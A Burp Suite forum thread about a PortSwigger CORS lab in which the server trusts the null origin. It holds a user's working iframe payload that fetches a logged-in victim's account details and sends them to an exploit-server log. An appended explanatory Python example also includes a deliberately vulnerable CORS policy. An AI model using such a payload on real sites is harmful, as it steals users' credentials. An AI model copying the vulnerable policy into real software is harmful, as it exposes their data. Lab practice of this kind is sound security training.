Burp Suite User Forum


Lab CORS vulnerability with trusted null origin: CORS missing allow origin

filippo | Last updated: Feb 07, 2023 02:31PM UTC

Good evening, I'm struggling to solve the lab; it seems to me that the CORS policy is not configured according to the lab. Following there's my HAR file generated trying to view the exploit. TIA

filippo | Last updated: Feb 08, 2023 07:46AM UTC

Good morning, actually the lab is solved: I mean delivering the exploit to the victim works, and I can see the log entry containing administrator data in the QS, but I cannot understand why my request is blocked when viewing the exploit. TIA Filippo

Hannah, PortSwigger Agent | Last updated: Feb 08, 2023 10:02AM UTC

Hi, to clarify: when you click on the "View exploit" button, you are not landing on the log page with your API key in the URL? Have you tried following any of the video solutions available?

filippo | Last updated: Feb 08, 2023 03:39PM UTC

Hi Hannah, no, I didn't follow any solutions, apart from yours, which confirms, even though I used fetch instead of XHR, that my exploit is correct. As I wrote before, when I view the exploit I get a 401 response from the fetch request to the accountDetails page and I see the iframe without any content loaded. Of course no related entry is present in the access log, but delivering the exploit to the victim lets me solve the lab. Anyway, I don't understand why my fetch request is blocked. I enclose the payload I used: <iframe style="visibility:block" sandbox="allow-scripts" srcdoc="<script> fetch('https://<my_lab_id>.web-security-academy.net/accountDetails', {credentials: 'include'}).then(response => response.text()).then((response) => document.location='/log?k='+encodeURIComponent(response));</script>"></iframe> Thanks F.

Hannah, PortSwigger Agent | Last updated: Feb 14, 2023 11:55AM UTC

Hi Filippo, when using your payload and the "View exploit" button, I get directed to the log page in the iframe. When viewing the log page after the exploit has been delivered, I see that my user has visited the access log with the username and API key in the URL. Please note that your user must be logged into their account when viewing the exploit. If you'd like to include some screenshots or a screen recording of the behavior you see, please drop us an email at support@portswigger.net so we can look into this further.
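For readers following the thread, here is an added example (not code from the forum, the lab, or PortSwigger) that shows the "trusted null origin" policy the lab is built around next to a hardened allowlist check, and a small classifier that separates "not logged in" (a 401 with a fresh session cookie, as in the HAR above) from a real CORS block. The allowlist origin and the sample headers are constructed for illustration.

```python
# Constructed allowlist for the hypothetical application origin.
ALLOWED_ORIGINS = {"https://app.example.com"}


def cors_headers_vulnerable(request_origin):
    """Weak policy: trusts the literal origin "null" and allows credentials.

    "null" is what browsers send from sandboxed iframes, file:// pages and
    some redirects, so any page that can produce a null origin can read the
    authenticated response. This mirrors the lab's misconfiguration."""
    if request_origin == "null" or request_origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": request_origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}


def cors_headers_hardened(request_origin):
    """Hardened policy: exact-match allowlist only; "null" is never trusted.

    Vary: Origin keeps caches from serving one origin's ACAO to another."""
    if request_origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": request_origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}


def classify_cors(status, headers):
    """Explain what a credentialed cross-origin fetch would experience.

    headers: response headers with case-insensitive names."""
    h = {k.lower(): v for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    acac = h.get("access-control-allow-credentials") == "true"
    if status == 401:
        # No valid session: the server refused, CORS was never the issue.
        return "unauthenticated"
    if acao is None:
        # Response arrived, but the browser withholds the body from script.
        return "blocked-no-acao"
    if acao == "null" and acac:
        return "vulnerable-null-origin"
    return "allowed" if acac else "allowed-no-credentials"


# Constructed headers modelled on the 401 seen in the thread's HAR.
UNAUTH_RESPONSE = {"Content-Type": "application/json; charset=utf-8",
                   "Set-Cookie": "session=PLACEHOLDER; Secure; HttpOnly; SameSite=None"}
```

Running `classify_cors(401, UNAUTH_RESPONSE)` yields "unauthenticated", which is why the iframe stays empty when viewing the exploit while logged out, even though the policy itself is exploitable once a session exists.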
